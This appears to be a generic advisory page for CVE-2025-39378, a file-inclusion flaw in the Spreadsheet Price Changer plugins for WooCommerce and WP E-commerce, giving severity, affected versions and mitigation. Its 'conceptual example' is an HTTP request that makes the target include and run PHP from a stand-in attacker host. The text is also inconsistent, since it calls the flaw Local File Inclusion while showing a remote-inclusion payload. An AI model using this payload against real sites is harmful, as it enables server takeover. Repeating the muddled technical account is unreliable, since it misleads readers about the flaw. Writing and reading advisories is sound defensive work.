Overview
The vulnerability identified as CVE-2025-39378 exposes a glaring security flaw within Holest Engineering Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light. This vulnerability can potentially lead to system compromise or data leakage if exploited, primarily affecting the users of the stated applications. The severity of this vulnerability necessitates immediate attention and mitigation.
Vulnerability Summary
CVE ID: CVE-2025-39378
Severity: High (7.5 CVSS Score)
Attack Vector: Network
Privileges Required: Low
User Interaction: Required
Impact: Potential for system compromise and data leakage
Affected Products
Product | Affected Versions
Holest Engineering Spreadsheet Price Changer for WooCommerce | n/a through 2.4.37
Holest Engineering Spreadsheet Price Changer for WP E-commerce – Light | n/a through 2.4.37
How the Exploit Works
The vulnerability stems from an improper control of filenames for include/require statements in PHP programs. This issue allows for PHP Local File Inclusion (LFI) that can be exploited by a remote attacker to execute arbitrary PHP code on the target system. This can lead to unauthorized access or control over the system, potentially leading to data leakage or system compromise.
Conceptual Example Code
Here is a conceptual example of how the vulnerability might be exploited, via a PHP GET request:
GET /pricechanger.php?file=http://malicious-site.com/malicious_payload.php HTTP/1.1
Host: target.example.com
In this example, the attacker tricks the system into including and executing a PHP file from a remote server (`malicious-site.com`). This file (`malicious_payload.php`) contains the malicious code that leads to system compromise or data leakage.
Mitigation
To remediate this vulnerability, apply the vendor patch as soon as possible. If the patch is not immediately available, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as temporary mitigation, helping to filter out malicious requests.
